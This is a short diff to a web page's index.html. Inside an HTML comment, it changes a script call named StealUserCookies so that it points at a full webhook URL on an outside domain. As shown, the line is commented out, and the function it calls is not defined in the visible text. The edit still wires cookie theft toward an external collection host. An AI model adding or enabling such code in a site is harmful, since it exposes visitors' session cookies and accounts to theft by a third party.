--- a/index.html
+++ b/index.html
@@ -34,7 +34,7 @@
 
     <!--
     <script>
-      StealUserCookies("webhook");
+      StealUserCookies("https://echoisafurry.com/webhook.html");
     </script>
     -->
 
